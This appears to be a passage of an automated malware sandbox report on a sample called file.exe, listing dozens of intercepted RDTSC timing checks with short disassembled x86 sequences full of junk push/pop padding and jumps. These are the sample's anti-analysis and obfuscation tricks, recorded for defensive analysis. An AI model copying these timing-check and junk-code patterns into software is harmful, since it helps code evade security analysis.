                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F550CA second address: F550E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC2C8DD5F00h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F550E3 second address: F55134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FC2C8B99098h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jnl 00007FC2C8B990A1h 0x0000002b lea eax, dword ptr [ebp+12479C7Ah] 0x00000031 mov dword ptr [ebp+12443748h], edi 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F55134 second address: F55138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F55138 second address: F5513E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5513E second address: F55143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F55143 second address: F5516C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B990A1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007FC2C8B99096h 0x00000016 jp 00007FC2C8B99096h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5516C second address: F31E74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+124412D8h], esi 0x00000010 lea eax, dword ptr [ebp+12479C36h] 0x00000016 jmp 00007FC2C8DD5F03h 0x0000001b mov dword ptr [ebp+122D1C51h], edi 0x00000021 push eax 0x00000022 jmp 00007FC2C8DD5EFDh 0x00000027 mov dword ptr [esp], eax 0x0000002a sub dword ptr [ebp+122D1CE8h], eax 0x00000030 call dword ptr [ebp+122D3113h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 jmp 00007FC2C8DD5F01h 0x0000003e pop eax 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88D43 second address: F88D4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88D4D second address: F88D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31EBA second address: F31EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31EC0 second address: F31EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88FED second address: F88FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88FF1 second address: F8900B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC2C8DD5F04h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89251 second address: F89255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F893FE second address: F89419 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC2C8DD5EFFh 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89419 second address: F89423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89423 second address: F8943D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8DD5F04h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F896E0 second address: F896E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F896E4 second address: F896EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F896EC second address: F8970B instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2C8B99098h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FC2C8B9909Ch 0x00000014 push ebx 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8970B second address: F89710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89710 second address: F89718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93E7A second address: F93E88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC2C8DD5EFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92C55 second address: F92C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FC2C8B99096h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92C62 second address: F92C68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92C68 second address: F92C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92C6F second address: F92C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93320 second address: F93353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B990A5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC2C8B990A7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93353 second address: F93357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93357 second address: F9337C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC2C8B99096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jne 00007FC2C8B99096h 0x00000016 jmp 00007FC2C8B9909Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9337C second address: F93382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93382 second address: F93390 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B9909Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93390 second address: F93396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92981 second address: F92994 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC2C8B99098h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b jnp 00007FC2C8B99096h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92994 second address: F929A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F929A1 second address: F929C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F929C0 second address: F929C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F929C4 second address: F929CE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC2C8B99096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F929CE second address: F929D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93652 second address: F93658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F937B9 second address: F937C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93906 second address: F9390A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9390A second address: F93910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93910 second address: F93930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FC2C8B990A8h 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93930 second address: F93936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93936 second address: F9393A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99E2E second address: F99E4A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC2C8DD5EFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FC2C8DD5EF6h 0x00000010 jng 00007FC2C8DD5EF6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99E4A second address: F99E84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jbe 00007FC2C8B99096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FC2C8B990A7h 0x00000014 pushad 0x00000015 jmp 00007FC2C8B9909Fh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99E84 second address: F99EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC2C8DD5F06h 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FC2C8DD5EF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9A2A4 second address: F9A2A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9A2A8 second address: F9A2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9A2B0 second address: F9A2B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C831 second address: F9C845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 je 00007FC2C8DD5EF6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FC2C8DD5EF6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C845 second address: F9C849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C849 second address: F9C862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FC2C8DD5EFCh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C862 second address: F9C868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C868 second address: F9C872 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC2C8DD5EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5856 second address: FA5866 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC2C8B99096h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4330 second address: FA4336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4336 second address: FA434C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC2C8B990A1h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA434C second address: FA4356 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC2C8DD5EFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4717 second address: FA4726 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC2C8B99098h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54AAF second address: F54AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54AB4 second address: F54ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54ABA second address: F54AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dx, B546h 0x0000000e push 00000004h 0x00000010 sub dword ptr [ebp+124413DFh], edx 0x00000016 push eax 0x00000017 pushad 0x00000018 jmp 00007FC2C8DD5F06h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54AEC second address: F54AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA49CD second address: FA49D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA49D7 second address: FA49E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edx 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA55B2 second address: FA55F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 jbe 00007FC2C8DD5EF6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jnl 00007FC2C8DD5EF6h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jp 00007FC2C8DD5EFEh 0x00000022 push ecx 0x00000023 jmp 00007FC2C8DD5F06h 0x00000028 pop ecx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8AFC second address: FA8B35 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC2C8B990BFh 0x00000008 jmp 00007FC2C8B990A9h 0x0000000d jmp 00007FC2C8B990A0h 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007FC2C8B99096h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA83B0 second address: FA83B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA83B6 second address: FA83EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC2C8B9909Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FC2C8B990A5h 0x00000011 jmp 00007FC2C8B9909Fh 0x00000016 pushad 0x00000017 jl 00007FC2C8B99096h 0x0000001d jno 00007FC2C8B99096h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8857 second address: FA885C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA885C second address: FA8862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8862 second address: FA8868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFA3A second address: FAFA4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC2C8B9909Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFA4F second address: FAFA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFA53 second address: FAFA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFA5D second address: FAFA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAEE3A second address: FAEE58 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC2C8B99096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FC2C8B99098h 0x00000019 push edx 0x0000001a pop edx 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAEE58 second address: FAEE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8DD5F01h 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAEE6E second address: FAEE99 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC2C8B9909Eh 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007FC2C8B99096h 0x00000010 push eax 0x00000011 jmp 00007FC2C8B990A8h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF2FA second address: FAF306 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF306 second address: FAF30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF30E second address: FAF313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF490 second address: FAF49B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF49B second address: FAF4A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF5F4 second address: FAF612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FC2C8B990A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB56F6 second address: FB56FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB56FA second address: FB56FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB56FE second address: FB570D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC2C8DD5EF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB570D second address: FB5734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007FC2C8B99096h 0x0000000e popad 0x0000000f pushad 0x00000010 ja 00007FC2C8B99096h 0x00000016 pushad 0x00000017 popad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d popad 0x0000001e ja 00007FC2C8B990B1h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5C1D second address: FB5C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5C22 second address: FB5C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC2C8B99096h 0x00000009 jmp 00007FC2C8B9909Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
